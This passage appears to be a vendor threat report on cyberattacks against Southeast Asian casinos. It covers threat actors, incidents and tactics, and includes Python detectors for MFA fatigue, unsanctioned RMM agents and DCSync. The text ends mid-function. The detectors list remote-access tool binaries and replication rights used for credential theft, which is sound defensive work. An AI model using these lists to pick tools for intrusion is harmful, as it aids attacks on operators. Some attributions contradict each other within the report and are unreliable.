
Introduction
Casinos and integrated resorts in Southeast Asia are increasingly in the crosshairs of sophisticated cyber adversaries, and the sector's overall cyber risk is rising.
Since January 2024, a surge of attacks has hit casino operators, hospitality systems, and gaming technology suppliers. These incidents have ranged from state-sponsored cyber-espionage to financially motivated ransomware heists. Major breaches at Philippine and Singaporean resorts in late 2023 foreshadowed many of the themes that became prominent in 2024.
High-profile incidents involving Marina Bay Sands, IGT, and a major Philippine resort highlight the diversity of adversary motivations, from data theft and extortion to surveillance and geopolitical interests. Supply chain compromises, insider threats, and unreported breaches further complicate the picture.
Chinese state-affiliated groups, reportedly acting in line with Beijing’s crackdown on offshore gambling, have conducted surveillance campaigns against casinos in the Philippines, Cambodia, and Laos. Meanwhile, ransomware operators such as ALPHV/BlackCat, Cl0p, and LockBit continue to exploit gaps in readiness, often relying on leak site disclosures to pressure victims into payment.
This report consolidates recent incidents, vendor intelligence, and regional reporting to provide cybersecurity leaders with a focused view of the threat landscape. It explains why casinos remain prime targets, outlines the tactics being used against them, and offers tailored recommendations to strengthen resilience.
Methodology
THEOS Cyber does not make independent attribution. References to groups such as APT41 or BlackCat are based on vendor assessments and open-source intelligence. Where incidents are based only on ransomware leak-site claims or other unconfirmed sources, this has been noted.
Why Southeast Asia’s Casinos Are Prime Targets

Land-based casinos and integrated resorts in Southeast Asia have become high-value targets for cyber adversaries. The surge of attacks since January 2024 noted in the introduction has touched casino operators, hospitality systems, and gaming technology suppliers alike, ranging from state-sponsored espionage to financially motivated ransomware campaigns, with the late-2023 breaches at Philippine and Singaporean resorts foreshadowing many of the themes that became prominent in 2024.
The casino industry remains highly attractive to adversaries. Ransomware operators deploy double extortion tactics to maximise leverage, while state-affiliated groups use long-dwell intrusions to gather intelligence. Both approaches threaten sensitive systems and critical data. What makes casinos uniquely vulnerable are their sprawling, always-on digital environments. Gaming floors, hotel operations, and back-office systems are often poorly segmented, with legacy IT and operational technology intertwined. Even slot machine networks — never designed with today’s threats in mind — can provide attackers with an unexpected foothold. Combined with under-resourced security teams, these factors create an unusually wide and appealing attack surface.
This report consolidates threat intelligence from both public reporting and private vendor sources, including research from CrowdStrike, ESET, and Kaspersky, together with THEOS Cyber's own insights from regional operations. While we do not conduct original attribution, we rely on established vendor assessments and focus on translating these findings into practical implications for casino operators.
Proactive defence remains essential: robust detection, continuous monitoring, and rapid response capabilities are far more effective than relying solely on post-incident remediation.
According to Sophos’ State of Ransomware 2025 report, the average ransom payment dropped by 50% to USD 1 million. Yet 57% of demands still exceeded USD 1 million, and nearly half of the victims paid. The data underscores that while payouts may be lower, pressure on victims remains high due to faster attacks and double-extortion tactics.
The following sections provide a focused view of current threat vectors, illustrated by real-world campaigns, together with recommendations tailored for the casino sector.
THEOS Cyber supports casino and integrated resort operators across Southeast Asia with services including Managed Threat Detection & Response (MTDR), Digital Forensics & Incident Response (DFIR), red teaming, and adversary simulation.
Threat Actors Targeting the Casino Sector

Casinos and integrated resorts in Southeast Asia face threats from both state-affiliated groups and financially motivated cybercriminals. Their objectives differ — espionage, surveillance, financial theft, or extortion — yet their techniques often overlap, exploiting common weaknesses such as flat networks, vulnerable third-party suppliers, and delayed patching cycles.
The following overview highlights key actors, notable incidents, and the tactics, techniques, and procedures (TTPs) they have been reported to use.
State-Sponsored APT Groups
APT41 (aka Wicked Panda / Winnti / Brass Typhoon)
APT41 exemplifies the convergence of espionage and financial crime. In 2024, security researchers observed the group pivoting from surveillance to direct monetization. (Sources: Sophos; additional public reporting.)
In one campaign reported in 2024, APT41 maintained access to a gambling operator's network for nearly nine months, siphoning data, planting cryptominers, and disrupting systems.
Tactics observed included:
- DLL hijacking for stealthy persistence
- Abusing legitimate admin tools like WMIC.exe
- Active Directory DCSync attacks to steal high-privilege credentials
- Targeting VPN subnets to pivot laterally
Open reporting over 2023–2025 indicates elevated focus on Southeast Asian gambling targets among China-linked clusters; commonly cited drivers include strategic interests and high cash flows in the sector.
Bronze Starlight (Operation “ChattyGoblin”)
Bronze Starlight has targeted regional gambling firms via supply-chain tampering and deceptive tradecraft. In one campaign dubbed “ChattyGoblin” by ESET, attackers trojanized the LiveHelp100 customer-support app used by a Philippine casino, keeping the UI functional while loading malicious components. (Source: ESET; corroborating public analysis.)
Tactics reported:
- HUI Loader side-loading via legitimate signed binaries
- Abuse of stolen code-signing certificates to increase trust
- Custom backdoors configured to terminate outside Asia
- Fake ransomware stages to create noise and delay incident response
Attribution of ChattyGoblin to Bronze Starlight remains debated. Technical overlaps exist, but not all researchers agree. The case highlights supplier/provenance risk and code-signing abuse, with objectives more aligned to surveillance than smash-and-grab disruption.
DiceyF (aka Earth Berberoka)
DiceyF is assessed as likely China-linked and focused on online gambling platforms in Southeast Asia. Kaspersky and Trend Micro identified its custom GamePlayerFramework, which orchestrates modular plugins for stealthy collection and remote control, emphasising espionage and data theft over immediate monetisation.
Tactics reported:
- Custom loaders and multi-stage GamePlayerFramework
- Modular keyloggers/clipboard and targeted file collection
- Persistence via run keys / scheduled tasks
- Low-noise C2 with infrequent beacons; HTTP(S) exfiltration in staged archives
Together, Bronze Starlight and DiceyF illustrate the breadth of China-linked campaigns: from supply-chain compromises to custom malware frameworks designed for long-term surveillance of casino operators.
Lazarus Group (aka APT38)
Lazarus/APT38 is attributed in public reporting with financially motivated operations across gambling and crypto (see MITRE ATT&CK: APT38 for profile and TTPs). In September 2023, approximately USD 41 million was stolen from Stake.com; the FBI publicly attributed the theft to Lazarus/APT38 on September 6, 2023, and the funds were laundered across chains. This adjacent case underscores the wider gambling ecosystem's exposure to state-linked financial theft. (Law-enforcement/public statements; vendor analysis.)
Tactics reported:
- Initial access via social engineering/supplier footholds; valid accounts
- Wallet/credential theft (seed/API keys) and automated withdrawal scripts
- Rapid laundering through mixers, cross-chain swaps/bridges, and peel chains
- Custom loaders/beacons alongside commodity tooling for cover
While Stake.com was an online casino, the case highlights Lazarus’ appetite for gambling-linked enterprises. Beyond casinos, the group is also widely reported to target banks and financial infrastructure worldwide, blending state priorities with revenue generation.
Cybercriminal Groups (Financially Motivated)

ALPHV / BlackCat (RaaS) and Scattered Spider (Affiliate / Access Broker)
BlackCat (also known as ALPHV) is a ransomware-as-a-service (RaaS) group whose affiliates have repeatedly targeted casinos and hospitality firms. In 2023, the group became notorious for combining identity compromise with double extortion (data theft plus encryption), applying pressure through leak-site shaming to secure multimillion-dollar ransom payments. (Industry and media reporting.)
A key enabler has been Scattered Spider (also tracked as Octo Tempest, UNC3944, 0ktapus, Muddled Libra) — an English-speaking cybercrime crew that evolved out of The Com (“The Community”), a loose network of SIM-swapping and phishing actors. SANS reporting (2024) and multiple vendor analyses note that Scattered Spider frequently acts as an affiliate and access broker for ALPHV/BlackCat. The group specializes in social engineering help desks, MFA fatigue, SIM swaps, and identity provider (IdP) hijacking, then hands over enterprise access to BlackCat operators for ransomware deployment.
Notable Incidents:
- MGM Resorts (Sep 2023): Scattered Spider impersonated MGM’s help desk, allowing BlackCat to deploy ransomware that paralyzed casino floors — shutting down thousands of slot machines, ATMs, room keys, and reservations. Estimated losses exceeded USD 100 million.
- Caesars Entertainment (Sep 2023): Attackers stole customer data, including Social Security and driver’s license numbers, and reportedly extorted a USD 15 million ransom to prevent leaks.
- Southeast Asia Casino Operator (Nov–Dec 2023): A major outage disabled slot machine banks and hotel systems. Management cited “technical issues,” but ALPHV later claimed responsibility on its leak site and began releasing internal data.
Tactics reported:
- Social engineering via phone/SMS phishing, SIM swapping, and MFA fatigue
- Abuse of IdPs (e.g., Okta) for session hijacking and device registration
- Use of remote monitoring and management (RMM) tools to blend in with admins
- Data exfiltration before encryption; leak-site coercion as leverage
- Deployment of ALPHV/BlackCat ransomware across Windows domains
Casinos and resorts are particularly vulnerable because service downtime directly impacts revenue and reputation. The BlackCat–Scattered Spider partnership combines people-focused intrusion (social engineering) with technical precision (rapid ransomware deployment), maximising leverage over operators. As SANS noted, Scattered Spider represents the trend of English-speaking cybercriminals partnering with Russian-speaking RaaS groups — a convergence that has raised the cost and complexity of defending casino and hospitality enterprises.
(Sources: SANS “Defending Against Scattered Spider and The Com,” 2024; CrowdStrike; Microsoft; FBI; SEC filings)
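The help-desk-driven takeover described above leaves a recognisable trail in the identity provider's system log: a burst of rejected or expired MFA push challenges (MFA fatigue), or a new factor enrolled minutes after a help desk resets a user's password. The following detection logic is an added example written for this report, not code from SANS, Okta or any vendor cited here. It runs over constructed Okta System Log style events; the event type strings follow Okta naming conventions but are assumptions to verify against your own tenant, and every user, actor and timestamp is hypothetical.

```python
"""Detect help-desk-assisted identity takeover patterns in IdP system logs.

Added example, not part of the original report. Two checks over constructed
Okta System Log style events: (1) MFA fatigue, many push challenges rejected or
expired for one user inside a short window, and (2) a new MFA factor activated
shortly after a password reset performed by someone other than the user, the
sequence behind help-desk impersonation. Event type strings are assumptions
modelled on Okta naming; confirm them against your tenant.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, List

PUSH_FAIL_THRESHOLD = 5                      # failed pushes that count as a fatigue burst
PUSH_WINDOW = timedelta(minutes=10)
RESET_TO_ENROLL_WINDOW = timedelta(minutes=60)

# Assumed event type names (Okta-style); verify against your tenant's log schema.
EVT_MFA_VERIFY = "user.authentication.auth_via_mfa"
EVT_RESET = "user.account.reset_password"
EVT_FACTOR_ENROLL = "user.mfa.factor.activate"


@dataclass(frozen=True)
class FatigueAlert:
    user: str
    window_start: datetime
    failed_pushes: int
    approved_afterwards: bool   # a push succeeded after the burst: the user likely gave in


@dataclass(frozen=True)
class EnrollAfterResetAlert:
    user: str
    reset_by: str
    factor: str
    minutes_after_reset: float


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def mfa_fatigue(events: Iterable[dict]) -> List[FatigueAlert]:
    """Users with >= PUSH_FAIL_THRESHOLD failed push verifications in any PUSH_WINDOW."""
    fails, successes = defaultdict(list), defaultdict(list)
    for ev in events:
        if ev["eventType"] != EVT_MFA_VERIFY or ev.get("factor") != "push":
            continue
        bucket = successes if ev["outcome"] == "SUCCESS" else fails
        bucket[ev["target"]].append(_ts(ev["published"]))
    alerts = []
    for user, times in fails.items():
        times.sort()
        best, best_start, start = 0, None, 0
        for end, t in enumerate(times):          # sliding window over sorted failures
            while t - times[start] > PUSH_WINDOW:
                start += 1
            if end - start + 1 > best:
                best, best_start = end - start + 1, times[start]
        if best >= PUSH_FAIL_THRESHOLD:
            approved = any(s > best_start for s in successes.get(user, []))
            alerts.append(FatigueAlert(user, best_start, best, approved))
    return alerts


def enrollment_after_reset(events: Iterable[dict]) -> List[EnrollAfterResetAlert]:
    """Factor activated within RESET_TO_ENROLL_WINDOW after a reset by a different actor."""
    events = list(events)
    resets = [ev for ev in events if ev["eventType"] == EVT_RESET and ev["actor"] != ev["target"]]
    alerts = []
    for ev in events:
        if ev["eventType"] != EVT_FACTOR_ENROLL:
            continue
        t = _ts(ev["published"])
        for r in resets:
            if r["target"] != ev["target"]:
                continue
            delta = t - _ts(r["published"])
            if timedelta(0) <= delta <= RESET_TO_ENROLL_WINDOW:
                alerts.append(EnrollAfterResetAlert(
                    ev["target"], r["actor"], ev.get("factor", "unknown"), delta.total_seconds() / 60))
    return alerts


def _ev(published, event_type, actor, target, outcome="SUCCESS", factor=None):
    return {"published": published, "eventType": event_type, "actor": actor,
            "target": target, "outcome": outcome, "factor": factor}


SAMPLE_EVENTS = [  # constructed for the example; all identities hypothetical
    # a.lim: six pushes rejected in seven minutes, then one accepted (fatigue that worked)
    *[_ev(f"2025-03-02T09:0{m}:00Z", EVT_MFA_VERIFY, "a.lim", "a.lim", "FAILURE", "push")
      for m in (0, 1, 2, 3, 5, 7)],
    _ev("2025-03-02T09:08:30Z", EVT_MFA_VERIFY, "a.lim", "a.lim", "SUCCESS", "push"),
    # b.ong: two rejections, normal noise
    _ev("2025-03-02T10:15:00Z", EVT_MFA_VERIFY, "b.ong", "b.ong", "FAILURE", "push"),
    _ev("2025-03-02T10:40:00Z", EVT_MFA_VERIFY, "b.ong", "b.ong", "FAILURE", "push"),
    # c.goh: help desk resets the password, a new push factor is activated 18 minutes later
    _ev("2025-03-02T14:02:00Z", EVT_RESET, "hd.ravi", "c.goh"),
    _ev("2025-03-02T14:20:00Z", EVT_FACTOR_ENROLL, "c.goh", "c.goh", "SUCCESS", "push"),
    # d.wee: self-service reset followed by enrolment; actor is the user, so no alert
    _ev("2025-03-02T15:00:00Z", EVT_RESET, "d.wee", "d.wee"),
    _ev("2025-03-02T15:05:00Z", EVT_FACTOR_ENROLL, "d.wee", "d.wee", "SUCCESS", "totp"),
    # e.koh: help-desk reset, enrolment three hours later, outside the window
    _ev("2025-03-02T16:00:00Z", EVT_RESET, "hd.ravi", "e.koh"),
    _ev("2025-03-02T19:10:00Z", EVT_FACTOR_ENROLL, "e.koh", "e.koh", "SUCCESS", "push"),
]

if __name__ == "__main__":
    for a in mfa_fatigue(SAMPLE_EVENTS):
        print(f"MFA fatigue: {a.user} {a.failed_pushes} failed pushes from {a.window_start}, approved after: {a.approved_afterwards}")
    for a in enrollment_after_reset(SAMPLE_EVENTS):
        print(f"Factor enrolled {a.minutes_after_reset:.0f} min after reset of {a.user} by {a.reset_by}")
```

The second check is the more valuable of the two for a help desk that is the target: a reset performed by a help-desk analyst followed by a fresh factor is exactly what a legitimate "I lost my phone" ticket looks like, so the alert should route to a verification step (call-back on a number of record, manager confirmation) rather than be auto-closed.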
Cl0p (TA505) – Data Theft at Scale / MOVEit
Cl0p’s MOVEit mass-exploitation (2023) compromised hundreds of organizations, including casino-adjacent suppliers, demonstrating how operator risk extends to third-party ecosystems. Cl0p commonly favors data-theft-only extortion (no encryption) at scale. (Public advisories and vendor reporting.)
Notable incidents:
- Aristocrat Leisure (2023): Breach via MOVEit exploitation; employee data exposed.
- Crown Resorts (2023): Data exfiltrated during GoAnywhere MFT exploitation; operational impact limited but reputational risk high.
- Broader Supply-Chain Campaigns (2023): Hundreds of enterprises worldwide were hit during MOVEit exploitation, showing how hospitality and casino operators can be collateral damage when trusted vendors or IT providers are compromised.
Tactics reported:
- Zero-day exploitation of secure file transfer applications (MOVEit Transfer, GoAnywhere MFT, Accellion FTA)
- Automated exfiltration of bulk archives for negotiation leverage
- Quadruple extortion: data theft, leak-site shaming, encryption (in some campaigns), and direct customer contact
- Use of Cobalt Strike and other post-exploitation tools for lateral movement
- Credential harvesting with native Windows tools
Cl0p highlights the outsized supply-chain risk for casinos and integrated resorts. Even when core casino systems are not directly targeted, breaches at gaming technology providers, payroll processors, or hospitality service vendors can expose sensitive employee or customer data. For CISOs, this underlines the need to treat third-party platforms (particularly secure file transfer systems) as Tier-1 critical infrastructure, with compensating controls such as virtual patching, restricted access, and strict egress monitoring.
(Sources: Microsoft, CISA, industry reporting on MOVEit and GoAnywhere campaigns, vendor breach disclosures)
Other RaaS & POS-Targeting Threats (LockBit, Hive, Medusa, FIN7, FIN8, CHEF Spider)
Beyond ALPHV and Cl0p, other ransomware-as-a-service groups such as LockBit and Hive have also listed casino or hospitality-related victims in recent years, though specific Southeast Asian cases often remain unconfirmed. Medusa ransomware has extorted hotels, including a luxury Singapore hotel chain reportedly hit in 2024.
Meanwhile, POS-focused groups such as FIN7, FIN8, and CHEF Spider continue to pose risks. These actors historically breach internet-facing servers to implant POS malware (e.g., ShellTea), aiming to siphon payment card data. In 2023, CrowdStrike observed CHEF Spider shifting to service providers supporting hospitality and gaming operators, broadening the exposure path.
These groups highlight the breadth of monetization models in casino-focused cybercrime: from RaaS extortion (LockBit, Hive, Medusa) to low-level financial theft via carding syndicates (FIN8, CHEF Spider). The common thread is that attackers exploit customer-facing services and third-party providers, where downtime or data theft directly translates to lost revenue, reputational harm, and regulatory scrutiny.
(Sources: CrowdStrike, CISA, ComputerWeekly)
Summary of Key Threat Actors
The casino threat landscape in Southeast Asia reflects an eclectic mix of adversaries:
- State-backed attackers — primarily China- and North Korea-linked APTs conducting espionage and financially motivated campaigns.
- Cybercriminal groups — ransomware operators and carding syndicates pursuing extortion, customer data theft, or payment card fraud.
The table below summarises the most prominent threat actors observed or reported to target casinos and integrated resorts in the region:
Threat Actor | Affiliation | Primary Motive | Notable Campaigns / TTPs |
APT41 | Chinese APT | Espionage + financial theft | Nine-month gambling-operator intrusion (2024); DCSync; cryptomining; long-term monetisation intrusions |
Bronze Starlight | Chinese APT | Espionage | ChattyGoblin; LiveHelp100 trojan; HUI Loader; supply-chain tactics |
DiceyF / Earth Berberoka | Suspected Chinese APT | Espionage | GamePlayerFramework; modular surveillance; long-term data theft |
Lazarus / APT38 | North Korean APT | Financial theft | Stake.com heist; crypto laundering; also active against financial infrastructure worldwide |
ALPHV/BlackCat + Scattered Spider | RaaS + affiliate / access broker | Ransomware (double extortion) | MGM, Caesars, Southeast Asia casino operator (claimed) |
Cl0p | RaaS / extortion group | Data theft + extortion | MOVEit exploitation; Aristocrat; Crown Resorts via GoAnywhere (claimed) |
Other RaaS & POS groups (LockBit, Hive, Medusa, FIN8, CHEF Spider) | RaaS + financial crime | Ransomware + card theft | LockBit/Hive leak-site listings; Medusa hit on a Singapore hotel (2024); POS malware (ShellTea); service-provider targeting |
Local cybercrime syndicates | Regional groups | Fraud / opportunistic intrusions | Southeast Asia scam/fraud operations; potential pivot to resort IT or guest targeting; fewer confirmed major incidents than international groups |
Attribution Note: Some incidents listed in this report, particularly those involving Cl0p and a major Philippine resort, are based on threat actor leak site claims or indirect technical indicators. Where victim organisations have not publicly confirmed the breach, this has been clearly marked within the corresponding sections.
Notable Cyber Incidents Targeting the Sector (2023–2025)

Several significant cyber incidents have affected Southeast Asian casinos and integrated resorts from late 2023 through 2025. These case studies illustrate the range of threats – from data breaches to full-blown ransomware outages – impacting the sector.
Attribution Note: Some incidents listed below are based on threat actor leak site disclosures or indirect indicators. Where public victim confirmation is unavailable, this has been noted.
Southeast Asia Casino Operator Ransomware Outage (Philippines, Nov 2023)
A suspected ransomware attack shut down casino operations for nearly a week. Slot machines and kiosks went offline, ATMs and payments were disrupted, and hotel guests experienced service issues. Management initially cited an “IT systems issue,” but ALPHV/BlackCat later claimed responsibility and leaked internal data, suggesting ransom demands were refused. The gap between the operator’s official explanation and the attackers’ disclosure highlighted the credibility and reputational risks that follow long after technical recovery.
Impact: Operational downtime (gaming revenue loss), customer data exposure, reputational harm.
Significance: First major ransomware incident publicly tied to a Southeast Asian casino, showing that the region was not spared from the wave of global casino attacks (MGM, Caesars).
IGT Supplier Breach (Global, Nov 2024)
In November 2024, International Game Technology (IGT) – one of the world’s largest manufacturers of slot machines and casino systems – disclosed a cyberattack that disrupted parts of its IT systems and required continuity measures. Industry reporting likened it to other extortion-driven attacks, noting similarities to MGM, Aristocrat, and others hit by ransomware.
Impact: Potential exposure of R&D data and casino client information; service disruptions for downstream operators.
Significance: Supply-chain risk amplified — a vendor compromise can cascade across many casinos. If attackers gain source code or firmware, vulnerabilities could be weaponised on gaming floors.
Other Incidents
Beyond the headline breaches, several hospitality-focused cyberattacks underscore the broader risks to integrated resorts, where hotel, retail, and casino systems are often interconnected.
COMO Hotels & Resorts (Singapore HQ, Apr 2024)
RED Ransomware claimed theft of guest and HR data (including accounting records, contracts, and PII). COMO has not confirmed the breach; scope remains unverified.
Shangri-La Hotels (Asia, 2022 disclosure)
Attackers accessed guest databases at eight properties across Hong Kong, Singapore, Taiwan, Japan, and Thailand. ~290,000 Hong Kong guest records were exposed (names, contact info, membership/reservation data), though passports and payments were encrypted. Detection lag raised regulatory concern.
Crown Resorts (Australia, 2023)
Caught in Cl0p’s MOVEit supply-chain campaign.
Navajo Nation Casinos (U.S., 2023)
Ransomware disrupted tribal gaming operations.
DDoS Attacks (2023–2024)
ENISA reported that gambling was the single most targeted sector globally for DDoS in late 2023 (42% of incidents). In Southeast Asia, several online betting and crypto-gaming platforms faced extortion-driven DDoS campaigns — “pay or be knocked offline.”
Attribution Note: The Shangri-La and COMO Hotels incidents were disclosed via corporate statements and ransomware leak sites, respectively. As of this writing, COMO Hotels has not confirmed the breach publicly.
Tactics, Techniques, and Procedures (TTPs) Against Casinos

Threat actors targeting casinos and integrated resorts use a diverse mix of social engineering, software exploits, and stealthy lateral movement. Key TTP themes include:
Social Engineering & Phishing
Many casino attacks begin by targeting human vulnerabilities. The MGM breach was initiated by a voice phishing (vishing) call to an IT helpdesk staff. The attacker impersonated an employee and convinced support to reset credentials, granting access to internal systems.
Other attacks have used spear-phishing emails carrying malware or fake remote support requests. With large hospitality workforces, casinos and resorts are particularly vulnerable to credential theft through well-crafted lures. Attackers sometimes tailor their phish using guest data, loyalty programs, or internal project names.
AI tools like deepfake voice cloning now make vishing even more convincing. As one expert put it: “imagine getting a call from a ‘family member’ in distress — speaking with their voice.” Phishing campaigns often aim to steal VPN or RDP credentials, digital keys that, once compromised, can unlock core systems.
Exploiting Internet-Facing Systems
Both APT and cybercriminal groups exploit vulnerabilities in exposed servers or applications common in casino environments. In one wave of intrusions across Southeast Asia in 2023, web servers were compromised and web shells installed — giving attackers persistent backdoors into corporate networks.
Ransomware operators also target weaknesses in VPN gateways, RDP servers, or outdated software. In some Southeast Asian casino cases, investigators suspect attackers may have gained initial access through unpatched systems or weak remote access protections, though the exact vectors remain unconfirmed.
The Cl0p group’s use of MOVEit and GoAnywhere zero-day exploits in 2023 allowed them to steal data from dozens of organizations, including casino technology providers such as Aristocrat.
Unpatched critical vulnerabilities in file servers, content management systems, or even IoT devices (like digital signage or smart lighting) can provide the same kind of entry point for attackers.
Living off the Land & Legitimate Tools Abuse
Once inside a network, attackers often use built-in admin tools or legitimate software to move undetected.
Remote monitoring and management (RMM) tools have been a favorite of targeted eCrime groups in hospitality. In 2023, CrowdStrike observed groups like CHEF Spider and DISTANT Spider using off-the-shelf RMM apps like ConnectWise ScreenConnect and NetSupport Manager to maintain access on casino systems. These tools appear harmless because they’re often used by IT teams, making them perfect for blending in.
Sometimes, attackers trick users into running an installer; other times, they exploit servers to silently deploy the RMM agent. From there, they gain persistent remote desktop access under the guise of routine maintenance. These tactics have been used to reach point-of-sale networks or stage ransomware attacks.
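Because the RMM agents are legitimate software, the useful signal is not the binary itself but where it runs and what launched it. The detection below is an added example written for this report, not code from CrowdStrike or any RMM vendor. It inspects Sysmon Event 1 style process-creation records (constructed here) and flags RMM agents on hosts IT never enrolled, matching on the PE OriginalFileName as well as the on-disk name so that a renamed copy is still caught, and raising severity when the parent is a web server worker or an Office application, the two delivery paths described above. The product list, baseline and hostnames are hypothetical.

```python
"""Detect unsanctioned RMM agents from process-creation telemetry.

Added example, not part of the original report. Sysmon Event 1 style records
are constructed inline; RMM_BINARIES, the SANCTIONED baseline and all hostnames
are hypothetical and should be built from your own software inventory.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Binary names of common RMM / remote-access agents, keyed by product.
RMM_BINARIES = {
    "ScreenConnect": {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"},
    "NetSupport Manager": {"client32.exe"},
    "AnyDesk": {"anydesk.exe"},
    "Atera": {"ateraagent.exe"},
}

# Hypothetical baseline: hosts on which IT has deliberately deployed each product.
SANCTIONED = {
    "ScreenConnect": {"it-helpdesk-01", "it-helpdesk-02", "fd-kiosk-07"},
}

# Parents that should never launch an RMM agent: IIS workers (server-side exploitation)
# and user-facing applications (a user tricked into running an installer).
SUSPICIOUS_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe", "outlook.exe",
                      "msedge.exe", "chrome.exe", "firefox.exe"}


@dataclass(frozen=True)
class RmmAlert:
    host: str
    product: str
    image: str
    parent: str
    severity: str   # "high" when delivered by a suspicious parent, else "medium"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def identify_rmm(event: dict) -> Optional[str]:
    """Return the product name if the image name or PE OriginalFileName is a known agent."""
    names = {basename(event.get("Image", "")), event.get("OriginalFileName", "").lower()}
    for product, binaries in RMM_BINARIES.items():
        if names & binaries:
            return product
    return None


def detect_rmm(events: Iterable[dict]) -> List[RmmAlert]:
    alerts = []
    for ev in events:
        product = identify_rmm(ev)
        if product is None:
            continue
        host = ev.get("Computer", "").lower()
        if host in SANCTIONED.get(product, set()):
            continue  # IT-deployed agent on an enrolled host
        parent = basename(ev.get("ParentImage", ""))
        severity = "high" if parent in SUSPICIOUS_PARENTS else "medium"
        alerts.append(RmmAlert(host, product, ev.get("Image", ""), parent, severity))
    return alerts


SAMPLE_EVENTS = [  # constructed Sysmon Event 1 style records
    # Sanctioned helpdesk use: no alert.
    {"Computer": "IT-HELPDESK-01",
     "Image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "OriginalFileName": "ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    # Renamed NetSupport client dropped in a world-writable path on a cage workstation, via Word.
    {"Computer": "CAGE-WS-03", "Image": r"C:\Users\Public\Libraries\svchost_update.exe",
     "OriginalFileName": "client32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    # ScreenConnect spawned by the IIS worker on a loyalty-portal web server.
    {"Computer": "WEB-LOYALTY-01", "Image": r"C:\Windows\Temp\ScreenConnect.ClientService.exe",
     "OriginalFileName": "ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    # AnyDesk started by a front-desk user from Explorer: unsanctioned, but no suspicious parent.
    {"Computer": "FD-HOTEL-09", "Image": r"C:\Users\frontdesk\Downloads\AnyDesk.exe",
     "OriginalFileName": "AnyDesk.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    # Ordinary process: ignored.
    {"Computer": "CAGE-WS-03", "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for a in detect_rmm(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.product} on {a.host}: {a.image} (parent {a.parent})")
```

Matching on OriginalFileName is what makes the second sample fire: the attacker's renamed binary keeps its PE version resource, and Sysmon records it. Real deployments should also check the Authenticode signer and whether the agent's server address belongs to the operator's own RMM tenant, since an attacker can bring a legitimately signed agent pointed at their own relay.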
APT41, linked to multiple casino intrusions, also leaned heavily on Windows built-in utilities — abusing WMIC.exe for persistence and likely running PowerShell scripts and net use commands for lateral movement.
These “living off the land” techniques allow attackers to operate without importing a lot of malware, thus evading some defenses.
Malware and Implants
Even when attackers rely on legitimate tools to blend in, custom malware often enters the picture at some stage. Chinese espionage groups have deployed multifaceted frameworks such as DiceyF's GamePlayerFramework, which includes modules for keystroke logging, data exfiltration, and persistent access.
APT41, linked to multiple casino intrusions, was observed using the HUI Loader to execute payloads in memory and maintain stealth. One of the backdoors they deployed, known as “MistyCloud” (per SentinelOne reports), allowed ongoing covert access to compromised systems without detection.
On the ransomware front, ALPHV/BlackCat is typically introduced after initial access. In MGM’s case, ransomware was launched just one day after the social engineering attack, once domain admin rights were secured.
Notably, Unit 42 reported that BlackCat affiliates deployed a tool named “Munchkin” – a small Linux virtual machine planted inside victim networks to run ransomware from within and evade detection.
This trend of attacker-controlled virtual infrastructure inside victim environments has also been seen with RagnarLocker and is particularly dangerous for casinos, where virtualization environments may be less tightly monitored.
Lateral Movement via VPN/AD
In the large casino intrusions, attackers quickly escalate privileges and move laterally through the IT environment.
APT41’s campaign, for example, specifically targeted a VPN subnet (10.20.22.x), suggesting an attempt to access otherwise segmented systems or bridge to operational tech. They also performed Active Directory reconnaissance and DCSync attacks to impersonate a domain controller and steal password hashes. This gave them keys to the kingdom – enabling access to databases, file shares, and even ICS or CCTV networks if connected.
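A DCSync, as described here and in the APT41 tactics list earlier in this report, is noisy on the domain controller if directory service access auditing is enabled: each replication request produces a Security event 4662 whose Properties field names the replication control access rights. The detection below is an added example written for this report, not code from any vendor cited. The events are constructed, the allow-list of legitimate replicators is hypothetical, and the SourceHost field is not native to 4662 (a real pipeline joins it from the 4624 logon event sharing the same Logon ID).

```python
"""DCSync detection over Windows Security event 4662 records.

Added example, not part of the original report. A DCSync asks a domain
controller to replicate secrets using the directory-replication control access
rights. With "Audit Directory Service Access" enabled and a SACL on the domain
naming context, each such request is logged as event 4662 whose Properties
field lists the right's GUID. Only DC computer accounts and a few
replication-aware services should ever exercise those rights. Sample events are
constructed; ALLOWED_REPLICATORS is hypothetical.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Control access right GUIDs for directory replication (Microsoft-documented values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

# Hypothetical allow-list of principals that legitimately replicate: DC computer
# accounts and a directory-sync service account. In production, derive it from the
# Domain Controllers OU and known sync services rather than maintaining it by hand.
ALLOWED_REPLICATORS = {"dc01$", "dc02$", "svc_dirsync"}


@dataclass(frozen=True)
class DcsyncAlert:
    subject_user: str   # account that requested replication
    logon_host: str     # where the request came from (joined from the 4624 logon in practice)
    target_dc: str      # domain controller that logged the event
    rights: tuple       # replication GUIDs present in the request


def replication_rights(properties: str) -> tuple:
    """Return the replication GUIDs named in a 4662 Properties field (braces, case ignored)."""
    props = properties.lower()
    return tuple(sorted(g for g in REPLICATION_GUIDS if g in props))


def detect_dcsync(events: Iterable[dict]) -> List[DcsyncAlert]:
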